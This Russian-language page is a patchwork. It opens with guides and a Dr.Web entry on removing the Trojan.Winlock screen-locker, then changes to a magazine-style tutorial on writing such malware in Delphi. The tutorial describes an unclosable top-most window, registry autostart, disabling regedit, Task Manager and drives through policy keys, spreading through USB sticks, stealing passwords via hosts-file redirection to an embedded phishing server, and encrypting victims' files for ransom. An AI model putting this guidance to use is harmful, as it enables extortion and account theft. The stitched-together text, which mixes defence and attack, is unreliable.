Удаление вируса trojan winlock. Незакрываемое окно на WINDOWS API

Winlocker - разновидность вредоносного программного обеспечения, которая блокирует операционную систему пользователя. Естественно, если на компьютер попал этот вирус, он сразу же начинает творить свои дела. Например, после заражения он автоматически прописывает себя в автозагрузке системы, а это значит, что он автоматически запускается вместе с персональным компьютером. После запуска Winlocker ограничивает пользователя буквально во всех действиях с компьютерной мышью и клавиатурой. При этом еще и просит прислать на указанный счет определенную сумму денег, после оплаты которой он якобы автоматически удалится. Разумеется, если пользователь поведется на такую уловку, никакой разблокировки системы не произойдет.

Winlocker в большинстве своем обладает расширением.exe. При этом распространяется он обычно посредством различных электронных сообщений, которые в той или иной мере интересуют пользователя. К такому сообщению прикрепляется вложение, которое может быть либо картинкой, либо видеозаписью (хотя на самом деле это тот же самый Winlocker). Для того чтобы не попасться на уловку, пользователю достаточно быть бдительным и хотя бы взглянуть на расширение того файла, который был прислан ему. Обычно изображения имеют следующее расширение - .jpg, .pmg, .gif и др. Видеозаписи, в свою очередь - .avi, .mp4, .flv и т.д. Если расширение файла не соответствует этим расширениям, скорее всего это Winlocker (расширение которого.exe).

Как удалить Winlocker?

Если на ваш персональный компьютер все-таки проникло это вредоносное ПО, сперва следует убрать его из автозагрузки, а уже затем, полностью удалить с ПК. Во-первых, прежде чем приступать к удалению, следует проверить какие функции Winlocker заблокировал. Для этого следует нажать комбинацию горячих клавиш Ctrl + Alt + Delete. Если эти действия ничего не дали, тогда попробуйте запустить программу «Выполнить» с помощью комбинации Win + R и вписать команду regedit.

Стоит отметить, что в большинстве случаев ни одна из этих команд не работает. Тогда следует запустить компьютер в безопасном режиме (после перезагрузки нажать кнопку F8). Далее в командной строке также прописывается команда regedit и запускается редактор реестра. Здесь следует перейти по следующим веткам: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run и HKEY_CURRENT_USER / Software / Microsoft / Windows / CurrentVersion / Run. В этих ветках требуется удалить незнакомые вам программы: hkcmd.exe, igfxtray.exe, igfxpers.exe. Дальше нужно найти параметры Shell и UserInit, в значении которых должно быть прописано explorer.exe и путь к файлу userinit.exe (C:/Windows/system32/ userinit.exe), соответственно.

Обычно вместо одного из этих параметров прописывается путь к вредоносному файлу. Его требуется запомнить, а после того как верные значения будут введены, перейти по этому пути, найти файл и удалить.

(TROJ_VB.ACD, TR/Dropper.Gen, Trojan.Win32.Sovest.m, BehavesLike:Win32.Malware, Trojan:Win32/Sisproc, Trojan.Agent.JF, KillApp.L, Parser error, Trojan.VB.NID, Generic.cd, Trojan.Win32.Sovest.v, Generic.dx, BackDoor.Generic2.IIE, Trojan:Win32/Bumat!rts, VirTool:Win32/Obfuscator.M, Trojan.Win32.VB.bav, Trojan.Win32.Sovest.g, Backdoor.Pcclient.HR, Trojan Horse, Trojan:Win32/Provis!rts, Generic.BPD, TROJ_AGENT.WPQ, Trojan.Win32.Sovest.k, TROJ_AGENT.ABW, Trojan.Agent.VB.AQG)

Добавлен в вирусную базу Dr.Web: 2005-09-20

Описание добавлено: 2006-01-31

Тип вируса : Троянская программа

Уязвимые ОС : Win NT-based

Размер : 119 296 байт

Упакован : -

Техническая информация

Информация по восстановлению системы

Необходимо обратиться в Службу технической поддержки "Доктор Веб" для получения инструкций по восстановлению работоспособности системы.

Windows macOS Linux Android

1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.

1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
   • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
   • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт

В последнее время участились случаи заражения компьютеров вирусом Trojan.Winlock . Да не просто участились, а началась целая эпидемия! В России заражено несколько миллионов компьютеров, и их количество с каждым днем растет. Постараемся объяснить вам как удалить вирус Trojan.Winlock.

Для начала, немного информации о самом вирусе: как он попадает на компьютер, что делает и каковы последствия от его пребывания на ПК пользователя.

Вирус Trojan.Winlock является мошеннической троянской программой для вымогания денег у пользователей ПК. Попадает этот вирус на компьютер, в основном, через сайты для взрослых. Да-да, именно посетители данных сайтов и состоят в группе риска. Даже можно сказать, что их 98% от всех пострадавших. Остальные 2% – это посетители социальных сетей, типа одноклассники, и т.д. Эти цифры взяты, отнюдь, не из головы, а из опыта работы с пострадавшими от этого вируса.

Как вирус попадает на компьютер?

Самый частый способ попадания вируса на компьютер: к примеру, вы часто посещаете сайты для взрослых. Вы заходите на такой сайт, собираетесь посмотреть какое-нибудь видео. Нажимаете кнопку воспроизведения видео и перед вами появляется окно с предложением обновить кодек или драйвер или Adobe Flash Player. Конечно же это уловка. В окне обычно присутствует 2 кнопки — ДА и НЕТ. Некоторые сразу же жмут ДА, а другие, подумав хорошенько, ведь у них уже все установлено, жмут НЕТ. Главное правило: ПЕРЕД ТЕМ КАК ЧТО-ТО УСТАНАВЛИВАТЬ, ПРОВЕРЬТЕ, ДЕЙСТВИТЕЛЬНО ЛИ У ВАС ОТСУТСТВУЕТ ЭТО. И в первом и втором случаях вы все равно попались на уловку мошенников. Только в первом случае вы сразу получить вирус на свой компьютер, а втором случае, если вы нажали НЕТ, данное окно появится снова. Эту проблему можно решить. Так как всплывающее окно является приоритетным по сравнению с самим браузером, вы не сможете закрыть вкладку с открытым сайтом или сам браузер. В этом вам поможет сочетание клавиш CTRL + ALT + DEL. В появившемся «Диспетчере задач Windows», перейдите на вкладку «Приложения», выделите в списке запущенный приложений свой браузер, а затем нажмите «Снять задачу». Так же можно сделать и на вкладке «Процессы», просто здесь нужно будет найти процесс под именем «имя_вашего_браузера.exe» и нажать кнопку «Завершить процесс».

Вот некоторые примеры распространения вируса Trojan.Winlock.

А что же делать тем, кто нажал все-таки кнопку ДА и получил зловредный вирус на свой компьютер? Далее вы найдете решение как удалить троян Trojan.Winlock с вашего ПК.

Что вирус делает с компьютером и каковы последствия?

Trojan.Winlock блокирует операционную систему Windows так, чтобы пользователь не смог предпринять какие-нибудь действия по уничтожению вируса. Обычно, это окно на весь экран монитора с липовым предупреждением о том, что вы используете не лицензионное ПО (кстати, грамотный ход – бьёт на психику россиянина моментально, большинство ПО на компьютерах в России – не лицензионное), или ваш доступ к любимому сайту истек, что-то вроде этого (вариаций вируса сотни). Также бывает окно посередине экрана монитора (не на весь экран). Но, расположено оно так, что пользователю будет очень неудобно производить работы по удалению вируса, или по поиску информации в интернете. Также, в окне присутствует просьба отправить смс на определенный короткий номер для разблокировки системы. Первая ошибка жертвы – выполнение требований злоумышленников. Люди отправляют смс, с их счета снимается определенная сумма денег (обычно это 300 – 500 руб.) и вводят полученный код в специальное текстовое поле. Только вот есть одно «но». Некоторым приходит код, они вводят его и система разблокируется. Но вирус все равно остаётся на компьютере жертвы и через некоторое время опять становится активным. Остальным да же код не приходит, а деньги пропадают бесследно.

Примеры блокировки.

Вирус усложняет работу пользователя всевозможными запретами, например: запрещается редактор реестра, диспетчер задач, апплеты панели управления, меню «Выполнить», командная строка и многое другое. Сам троян, тем временем, прописывается в реестре, копирует себя в определенные каталоги, некоторые разновидности блокирует интернет . Было время, когда Trojan.Winlock только начал выходить на просторы рунета. Тогда существовали самые примитивные версии вируса: они удалялись сами через несколько часов работы компьютера, в некоторых версиях достаточно было ввести семь нолей и система освобождалась, они не появлялись в Безопасном режиме Windows! Если к вам «залетел» такой троян – задача по его уничтожению упрощается, а если троян более новой модификации, соответственно, задача усложняется. Последствия от пребывания на компьютере Trojan.Winlock могут быть разными: от затрат на отправление смс злоумышленникам, затрат на вызов мастера, который удалит вам этот вирус, до потери некоторых данных (например, если придётся переустанавливать ОС Windows) и нерабочего интернет-подключения. Всё зависит от случая, как повезёт вам с «питомцем».

Удаление вируса Trojan.Winlock

Итак, вы стали жертвой вируса Trojan.Winlock. Что делать?

Описанные способыудаления trojan winlock вируса требуют хотя бы начальные компьютерные знания, поэтому если вы «чайник» в компьютерах, то сразу рекомендуем вам обращаться в компьютерную помощь!

1. Первый способ. Подходит, если окно трояна в системе растянуто на весь экран. Запрещены: Редактор реестра, Диспетчер задач (CTRL + ALT + DEL), «Выполнить» (WIN + R). Вы не можете переключиться ни на какое окно в системе. При загрузке в Безопасном режиме (при загрузке ПК, в момент перед показом заставки Windows, нажмите F8 и выберите Безопасный режим), точно такая же картина что и в обычном режиме работы системы. Вирус активен и там. Требуется загрузочный диск (BootCD, LiveCD). Это единственный минус данного способа, потому что не у всех есть такие диски. Но, лично для меня, более удобный и быстрый. Можно да же отбросить всё выше сказанное о данном способе и вывести одно условие – у вас должен быть загрузочный CD/DVD.

2. Второй способ. Подходит, если у вас нет загрузочного диска. А так же: окно троянской программы растянуто на весь экран или посередине, запрещено всё что перечислялось в первом способе (или частично запрещено). Если вам удалось загрузить Безопасный режим и вирусная программа в нем не отображается – этот способ для вас.

3. Третий способ. Подходит, если у вас нет загрузочного диска. А так же: окно троянской программы растянуто на весь экран или посередине, запрещено всё что перечислялось в первом способе (или частично запрещено). В Безопасном режиме Windows вирус активен.

После того, как мы определились со способом, приступаем к удалению.

Первый способ удаления вируса

Берём загрузочный диск, не сильно важно его название, главное чтобы была аварийная операционная система (конечно можно воспользоваться и Norton Commander с дискеты если повезёт, но у нас все таки 21 век).

Итак, нам нужно включить загрузку с привода до загрузки с жесткого диска. Это делается в настройках BIOS. При включении компьютера, в самом начале вы увидите надпись «Press DEL to enter Setup» (у ноутбуков в основном написано вместо DEL -> F2). После того как вы нажали нужную клавишу загрузится настройка BIOS. При помощи стрелок на клавиатуре и клавиши Enter нужно зайти в раздел Advanced BIOS Features. Далее, всё зависит от фирмы изготовителя BIOS. В некоторых нужно найти пункт Boot Device Priority, зайти в него и там настроить приоритет загрузки устройств. В других вы сразу найдете настройки приоритета когда зайдете в раздел Advanced BIOS Features. Если вы хоть чуть-чуть обладаете английским языком – вы разберётесь без проблем. Итак, вам надо найти что-то вроде этого:

1st Boot Device
2nd Boot Device
3rd Boot Device

1st Boot Device – устройство, которое загружается первым, обычно там стоит жесткий диск (HDD). Нажав Enter (или другую клавишу – смотрите нижнюю панель в BIOS) выберите CD-ROM.
2nd Boot Device – устройство, которое загружается вторым. Нажав Enter (или другую клавишу – смотрите нижнюю панель в BIOS) выберите HDD.

Устройство выбрано. Теперь нужно сохранить изменения. Для этого возвратитесь в стартовое меню и выберите Save and exit Setup. В появившемся окошке введите «Y» и нажмите Enter. Вставьте диск в дисковод. В нужный момент загрузки компьютера начнется запуск загрузочного диска. Аварийные ОС на таких дисках бывают разными. Некоторые практически полностью выглядят как и обычная Windows, в них есть проводник. В некоторых вместо проводника используется файловый менеджер (например Total Commander). Суть не в этом – главное, чтобы вы могли перемещаться по каталогам и удалять файлы.

Приступим к чистке системы. Самые распространенные каталоги, куда копируется наш троян, это:

в Windows XP

C:\Documents and Settings\ИМЯ_ВАШЕЙ_УЧЕТНОЙ_ЗАПИСИ\Local Settings\Application Data
C:\Documents and Settings\ИМЯ_ВАШЕЙ_УЧЕТНОЙ_ЗАПИСИ\Local Settings\Temp
C:\Documents and Settings\ИМЯ_ВАШЕЙ_УЧЕТНОЙ_ЗАПИСИ\Local Settings\Temporary Internet Files

в Windows Vista/Windows 7

C:\Users\ИМЯ_ВАШЕЙ_УЧЕТНОЙ_ЗАПИСИ\AppData\Roaming
C:\Users\ИМЯ_ВАШЕЙ_УЧЕТНОЙ_ЗАПИСИ\AppData\Local\Temp
C:\Users\ИМЯ_ВАШЕЙ_УЧЕТНОЙ_ЗАПИСИ\AppData\Local\Microsoft\Windows\Temporary Internet Files

В корне 1-го пути ищем незнакомые нам exe, tmp файлы. Далее переходим к самым обитаемым местам вируса – 2 и 3-й пути. В папке Temp выделяем все файлы и папки и удаляем. Этот так, чтоб наверняка. В папке Temporary Internet Files выделяем все файлы и удаляем. Если там будут папки, то удаляйте файлы внутри этих папок. Так же можно просмотреть пути C:\, C:\Program Files, C:\Documents and Settings\ИМЯ_ВАШЕЙ_УЧЕТНОЙ_ЗАПИСИ\Local Settings\Cookies, C:\WINDOWS (часто в C:\WINDOWS бывает вредоносный файл cmon.exe, удалите его), но обычно хватает чистки 2-го и 3-его пути. Если на компьютере несколько пользователей, то произведите для профилактики такие же действия и с их учетными записями. Всё, чистка завершена. Теперь перезагружаемся, вытаскиваем загрузочный диск и ждём момента «Х». Вот экран приветствия, начинает грузиться Рабочий стол и всё, окно вируса не появилось. Вы все сделали правильно. Ну а если появилось, значит плохо чистили, загрузите опять загрузочный диск, и пройдитесь опять по всем путям, может что-то пропустили. Для тех, у кого «пропал» троян : сами файлы мы удалили, но вирус мог оставить записи в реестре. Нам нужно дочистить систему. Входим в Пуск -> Выполнить (WIN + R) и набираем команду regedit а затем жмем Enter. Если выводится сообщение «Редактирование реестра запрещено администратором системы «, то смотрите раздел статьи «Запреты». Если все нормально, то перейдите к ключу HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. В этом разделе хранятся записи автозагружаемых программ текущего пользователя. Эти записи отображаются справа. Конечно, все имена программ и системных файлов вы не можете знать, поэтому, я советую вам обратить внимание на пути к этим файлам, которые отображаются в поле «Значение». Вы сможете понять что это вирус по пути, он может вести к папке Temp или Temporary Internet Files, а так же к Application Data. По имени файла в пути то же можно понять что это вирус. Файл может называться так: ~DFFE93.tmp или так 16A8.exe. Сама запись может называться как угодно. Очень часто её называют Microsoft Audio Driver или что-то вроде этого. Главное не название, а путь и имя файла, запомните это. Итак, допустим, что мы здесь ничего подозрительного не нашли. Теперь переходим к разделу HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Здесь, обычно побольше записей. Проверяем раздел на наличие записей вирусов. И проверьте еще 3 пути (они все рядом):

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

Далее переходим к HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon. Здесь есть несколько значений, куда троян мог прописаться: Userinit, UIHost и Shell. Сейчас приведем примеры, как эти записи должны выглядеть по умолчанию:

Userinit = C:\WINDOWS\system32\userinit.exe,
UIHost = logonui.exe
Shell = explorer.exe

Сверьте наши и ваши записи. Если что – исправляем. Ну вот и всё. Если всё сделали правильно, то вирус удалён с компьютера. Но, помните одно – разновидностей Trojan.Winlock очень много. Мы привели пример того, как и куда прописывается и копируется большинство этих троянов , но различия могут быть.

Второй способ удаления вируса

В данном способе у нас нет возможности воспользоваться загрузочным диском, но, вирус не активен в Безопасном режиме Windows. Здесь все просто. Загружаем Безопасный режим (как это сделать написано выше). У нас практически полноценная ОС. Теперь делаем всё то же самое, что и в Первом способе, начиная со слов: «Итак, приступим к чистке системы. Самые распространенные каталоги, куда копируется наш троян , это:». После проделанных действий перезагружаем компьютер и радуемся жизни (если всё сделали правильно).

Третий способ удаления вируса

Этот способ для тех, кому не повезло. У вас нет загрузочного диска, в Безопасном режиме вирус активен. Что же делать? Мучиться! Это самый долгий способ удаления вируса. Если у вас окно вируса посередине экрана, меню «Пуск» видно и части Рабочего стола видны. Вам нужно попасть в Мой компьютер. Далее, меню Сервис -> Свойства папки -> Вид -> Показывать скрытые файлы и папки -> OK. Если скрытые файлы не отобразились, значит вирус запретил показывать скрытые файлы… Для этого смотрите раздел статьи «Запреты». Предположим, что скрытые файлы и папки отобразились. Теперь вам нужно сделать то же самое что и в Первом способе, после слов: «Итак, приступим к чистке системы. Самые распространенные каталоги, куда копируется наш троян , это:». Но, есть одна загвоздка, окно вируса так мешает отображению папок… Вам придётся изменять размер окон, перетаскивать их туда-сюда, смотреть содержимое по частям. В общем, очень неудобно! Но тут уж ничего не поделаешь. Вызвать Диспетчер задач? Да же если он разрешен, все равно вы его не увидите, потому что он будет под окном вируса. Очень неприятная ситуация. Если у вас есть программа Process Explorer от Sysinternals – можете попытаться запустить её. Она показывает все процессы, да же скрытые. Можно попытаться убить процесс вируса через неё. Но, опять же, некоторые разновидности вообще запрещают запуск файлов. Так что, как повезёт (если запустится, переключитесь на неё с помощью сочетания клавиш ALT + TAB. Она, в отличии от Диспетчера задач покажется поверх окна вируса). И вот так, в таких условиях нужно почистить систему от вируса. Затем перезагрузитесь и почистите реестр. Всё должно получиться, крепитесь. Следующая ситуация, это когда окно вируса растянуто на весь экран. Еще худшая ситуация. Все вызываемые окна остаются позади вируса (если вам повезет и попадется старая разновидность, то знайте, у них были проблемы со скрытием вызываемых окон, и чуть-чуть помучившись, можно будет вызвать желаемое окно на передний план. Используйте ALT + TAB, WIN + D и смекалку). Есть еще одна хитрость: зажмите WIN + U. Появится диспетчер служебных программ. Здесь вы сможете включить Экранную лупу или Экранную клавиатуру, без разницы. Главное то, что при запуске покажется справочное окошко, а в нем ссылка на Веб-Узел Майкрософт, тем самым вы запустите браузер. Если интернет подключен, то вы сможете поискать какую-нибудь информацию в интернете по вирусу или скачать программу Dr.Web CureIt!, точнее, выбирайте не «Сохранить», а «Запустить». Просканируйте систему этой программой, может она что-нибудь и найдёт, хотя эта фишка проходила так же со старыми версиями трояна. Если б был такой антивирус, который засекает и уничтожает Trojan.Winlock , цены б ему не было… Попробуйте восстановить систему, в некоторых случаях помогает. Для этого вам нужно запустить Безопасный режим с поддержкой командной строки. Нажмите клавишу F8 во время загрузки Windows (до появления логотипа и строки прогресса). Выберите Безопасный режим с поддержкой командной строки. В командной строке вам нужно ввести C:\WINDOWS\system32\Restore\rstrui.exe. Далее выполняйте все указания, которые появятся на экране. Так же, можете отредактировать реестр Windows, запустив команду regedit.exe. Что удалять в реестре написано выше. Но, всё это может быть запрещено вирусом. Попытайтесь сделать всё вышеописанное, если уж совсем худо, то спасет только переустановка ОС. А лучше позвоните в какую-нибудь службу по ремонту компьютеров, потратитесь немного, но решите проблему.

Не секрет, что многие пользователи настолько далеки от информационных технологий, что допускать их к работе за таким сложным устройством, как ЭВМ, чревато. Но как организовать ограничение доступа к ПК? Ведь включить компьютер нынче может любой, у кого хотя бы на 10% руки растут из плеч. К счастью, существует целый класс программ, помогающий ограничить пользователю доступ к различным компонентам операционной системы: от простого запрета играть в Косынку или Сапера, до полной блокировки Windows.

Как происходит заражение?

Однако не все пользователи соглашаются на добровольную блокировку своей системы (хочу сконцентрировать твое внимание на том факте, что в этой статье мы не станем рассматривать создание вредоносного ПО). Так вот, нередко подобный софт доставляется на их машины в виде вируса. Способов заразить жертву чрезвычайно много. Среди них наибольшей популярностью пользуются:

1. БАГИ БРАУЗЕРОВ. Ни для кого не секрет, что одна из целей современного вирусописателя - браузер пользователя. Полезных web-сервисов пруд пруди, и пользователи, конечно же, ими пользуются. Для многих браузер - самая часто используемая программа, которая очень редко закрывается (у меня так вообще не закрывается).

Не надо ходить к гадалке в поисках ответа на вопрос «через какую дверь лучше всего прорваться в систему пользователя?». Тут и так ясно: необходимо использовать уязвимости самых популярных браузеров. Чтобы применить этот способ, не нужно обладать особым интеллектом. Достаточно пошерстить по security-сайтам, найти (если он есть) подходящий сплоит и красиво оформить его для своих нужд. Быстро, просто и бесплатно.

2. FLASH. В последние месяцы компания Adobe регулярно лажает. Не успеют они выпустить новую версию flash-плеера, как хакеры умудряются обнаружить в нем критическую уязвимость. Находят, тыкают разработчиков носом, а те не спешат их исправлять.
Глупо полагать, что в это же время вирмейкеры будут тихо сидеть на пятой точке и ждать, когда же залатают багу. Они постоянно пытаются использовать в корыстных целях свежую уязвимость и выжать из нее максимальную выгоду. В результате получается, что после просмотра тобой забавного ролика система начинает вести себя странно.

3. ПОЛЬЗОВАТЕЛЬСКАЯ НАИВНОСТЬ. Когда я начал готовить эту статью, ради эксперимента загрузил ОС в виртуальной машине и попробовал побродить по «сомнительным» сайтам. Не поверишь, но я умудрился три раза подхватить Winlocker, согласившись на установку «последней версии» flash-плеера и «специальных» кодеков. Честно говоря, я был немного в шоке, так как думал, что подобные способы уже не катят.

На чем будем кодить?

Я долго размышлял над тем, на каком языке писать примеры к этой статье, и решил вспомнить проверенный временем Delphi. «Так у тебя же exe’шник получится под мегабайт!», возразишь ты. Отчасти твоя правда, но эту проблему мы решим еще на стадии зачатия проекта. Весь код будет приведен на чистом API. Соответственно, наш зверек в скомпилированном виде будет весить менее 100 Кб. Еще пару десятков кило мы сбросим за счет манипуляций архиватором байт-кода над полученным бинарником.

Основа любого Winlocker’а

Фундамент любого Winlocker’a - форма, растянутая почти на весь экран. Причем это не просто большая форма, а окно, которое собой перекрывает все остальные и совершенно не слушается никаких команд. Ни свернуть, ни изменить размер, ни уж тем более завершить процесс программы. На первый взгляд может показаться, что вирусописатели изобрели ноу-хау, но в реале все намного проще. По факту, это самое обычное окно, для которого установлен стиль отображения «поверх всех». Чтобы окно вело себя как партизан и не реагировало на просьбы юзера, разработчики слегка модифицируют процедуру обработки сообщений извне.

Модификация сводится к банальной обработке сообщения WM_SYSCOMMAND. Если быть еще точнее, то в процедуре обработки полученных сообщений нужно всего лишь объявить проверку на сообщение WM_SYSCOMMAND. Самое смешное, что в обработке этого сообщения можно вообще не писать код - форма и так перестанет реагировать на события внешней среды.

Автостарт

Вирус должен загружаться вместе с операционной системой. Существует несколько способов обеспечить своей программе автозагрузку. Условно их можно разделить на две группы: простые и продвинутые. На рассмотрение продвинутых не хватит места в статье, поэтому рассмотрим лишь простые, основанные на использовании реестра. Итак, в реестре есть несколько уголков автостарта:

1. HKLM\Software\Microsoft\Windows\CurrentVersion\Run - отсюда стартуют программы, запускаемые при входе в систему любого юзера.
2. HKCU\Software\Microsoft\Windows\Current\Version\Run - место, аналогично предыдущему, за исключением того, что отсюда грузятся программы текущего пользователя.
3. HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - список программ, запускаемых до входа пользователей в систему.
4. HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\ Run - этот раздел реестра отвечает за старт программ, добавленных в автозагрузку через групповые политики.
5. HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows - еще одно место, содержащее список программ, загружаемых вместе с Windows.
6. KHLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon - в этой ветке указывается ссылка на винлогон, но ничто не мешает указать и путь до своей программы.
7. Папка автозагрузки. Пожалуй, самый примитивный способ, но тем не менее, многие вирусописатели им пользуются.

Какое из предложенных мест автозагрузки выбрать для своего творения? Точного ответа нет, но крайне не рекомендуется ставить все на какой-то один их предложенных вариантов. Куда лучше использовать комбинацию, то есть прописываться сразу в несколько мест. Пример записи в автозагрузку на WinAPI приведен во второй врезке.

И тебя заблокируем, и меня заблокируем!

Например, ты запросто можешь назначить программу, которая будет запускаться после загрузки системы или заблокировать старт определенного приложения. Практически все операции, которые выполняются через эту оснастку, изменяют определенные ключи реестра. Если ты умудришься разузнать, какие именно ключи реестра модифицируются, то без проблем сможешь изменять их прямо из своей программы. Как это сделать? Существует два варианта: применить метод научного тыка, или воспользоваться утилитой ProcessMonitor от Марка Руссиновича. Второй способе явно круче, поэтому советуем скачать утилиту и приступить к исследованиям.

Редактор реестра

Большинство пользователей привыкли редактировать реестр с помощью встроенного в Windows редактора реестра regedit. Поскольку наш вирус будет вносить изменения в реестр, нам необходимо не допустить ковыряний в реестре со стороны нерадивого пользователя. Нечего ему совать свой любопытный нос куда не следует. Решить эту задачу проще всего путем блокировки запуска редактора реестра. Чтобы выполнить блокировку, достаточно создать ключ DisableRegistryTools со значением 1 в ветке HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System .

Диспетчер задач

Все без исключения винлокеры, которые я видел, блокировали запуск диспетчера задач. Что ж, не станем от них отставать. Реализуется эта фича созданием ключа DisableTaskMgr (тип dword) со значением 1 в той же самой ветке, где и DisableRegistryTools.

Установка и удаление программ

Особо мозговитые юзеры с помощью апплета «Установка и удаление программ» в случае заражения системы пытаются инсталлировать антивирусы. Это легко пресечь, если создать ключ NoAddRemovePrograms со значением 1 (тип dword) все в том же разделе, где и DisableRegistryTools.

Блокируем доступ к дискам

Чтобы полностью испортить пользователю настроение, можно вообще заблокировать доступ к присутствующим в системе дискам. Пусть юзер даже не пытается запустить антивирус со своей флешки! Реализуем этот трик путем создания ключа NoViewOnDrive (dword) в разделе HKEY_LOCAL_MACHINE\ Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. В качестве значения для ключа указываем битовою маску блокируемого диска. Например, для диска C это будет 4. В случае, если требуется заблокировать несколько дисков, то их маски придется сложить. Например, значение 12 будет соответствовать блокировке дисков C (4) и D (8).

Фишка №1: в любом месте веселее вместе

Заразил компьютер бедного пользователя? Не забудь позаботиться о его друзьях! Помни, чем шире распространится вирус, тем больше шансов получить деньги. Обосновавшись на вражеской машине, нужно не терять времени зря, а пытаться найти новый плацдарм. Как это сделать? Один из простых и самых действенных способов - мониторинг и заражение флешек. Поскольку пользователи постоянно пользуются флешками, нашему вирусу будет легко мигрировать из одной системы в другую. Определить факт подключения флешки легко. Достаточно написать код, обрабатывающий событие WM_DEVICECHANGE.

В коде из третьей врезки я использовал константы и структуры, описания которых нет в модулях, поставляемых вместе с Delphi. Их придется описывать самостоятельно. Я всю информацию брал с MSDN, но ты можешь не париться, а сразу взять исходник моего кода на DVD.

Фишка №2: ваши пассы будут наши!

Какими web-сервисами пользуется современный юзер? Не нужно быть семи пядей во лбу, чтобы назвать хотя бы несколько из них: почта, одноклассники, Вконтакте, facebook, twitter, etc. Список можно продолжать до бесконечности. К чему это я клоню? А к тому, что находясь на вражеской территории, было бы неплохо собрать все пароли. Авось, в будущем пригодятся. К тому же, имея на руках такие козыри, становится реальным простимулировать жертву. Например, получив пароли от всевозможных аккаунтов, автор вируса может воспользоваться ими для смены контактных данных и изменения паролей на свои. В результате реальный пользователь попадет в очень нехорошую ситуацию. Проще говоря, он лишается своего аккаунта. Это уже куда серьезней заблокированного рабочего стола, а раз так, то шансы оплаты твоих «услуг» возрастают.

Сразу возникает вопрос, а каким образом это проще всего сделать? Обычно юзеры хранят свои пароли прямо в браузере, поэтому сразу возникает идея угнать файлик хранилища паролей. Пример такого угона был продемонстрирован в статье «Злобный комп». Я же продемонстрирую тебе альтернативный способ. Идея заключается в банальном модифицировании hosts. В этом файле прописываются соответствия типа «символьный адрес сайта:ip». Наша программа должна уметь модифицировать этот файл и добавлять соответствия для популярных web-сервисов. «А куда будем перекидывать юзера?». Можешь для этого состряпать свой evil-сайт, на котором и будут располагаться скамы популярных сервисов. Этот способ прост в реализации, но при массовом заражении пользователей такие сайты наверняка не будут жить долго. В связи с этим откажемся от предложенного способа, а пойдем не совсем стандартным путем - встроим в вирус маленький webсервер. При таком раскладе пунктом назначения переадресации у нас будет localhost.

Например: 127.0.0.1 www.odnoclassniki.ru

Рассматривать правку файла hosts не будем, лучше сразу взглянем на то, как с помощью Delphi поднять свой WEB-сервер. Если ты постоянный читатель нашего журнала, то должен хорошо ориентироваться в Winsock API. В свое время в рубрике Кодинг проскакивали статьи про написание всевозможных клиентов (FTP, PROXY, IRC и т.д.) с использованием лишь api-функции. Рекомендую тебе поднять подшивку и хорошенько ознакомиться с сабжевой темой (масло масляное - прим. ред.).

Теперь, вместо одноклассников.ру, жертва попадет не на настоящий сайт популярной социальной сети, а прямо в лапы нашего evil-сервера. Само собой, web-сервер должен быть вежливым и отобразить реальную страницу одноклассников (читай - скам сайта, его нужно заранее подготовить). Ну а дальше все просто: юзер вбивает свои данные для входа, после чего наш web-сервер их сохраняет. Чтобы откровенно не палиться, желательно сделать редирект на страницу с предупреждением о том, что сайт в данный момент закрыт на профилактические работы. Или, как вариант - сохранив, форвардить введенные данные на реальные одноклассники.

Фишка №3: экстази для пользователя

Как зло-программеры стимулируют пользователя на расставание с кровными платными SMS? По-разному. Например, шифруя ценные для него файлы. На какие файлы обращать внимание? Лучше всего на те, от которых может зависеть работа/учеба жертвы, например: документы (doc, xls, mdb, ppt, txt), изображения (jpeg, png, bmp), исходные тексты (php, pas, c, h, cpp, dpr, py и т.д.). Если жертва писала дипломную работу или какой-нибудь сверхважный отчет, который завтра сдавать, то у злоумышленника есть все шансы получить денежное вознаграждение.

Теперь поговорим о технической реализации этой штуки. Поиск файлов осуществляется с функциями FindFirs() и FindNext() из модуля Sysutils. Работать с ними легко, но простота такого фастфуда отрицательно отразится на фигуре нашего приложения. Поскольку набирать лишний вес нам ни к чему, мы воспользуемся более диетическими продуктами: FindFirstFile() и FindNextFile(). Работать с ними чуть сложнее (см. пример поиска файлов на диске), но красота требует жертв.

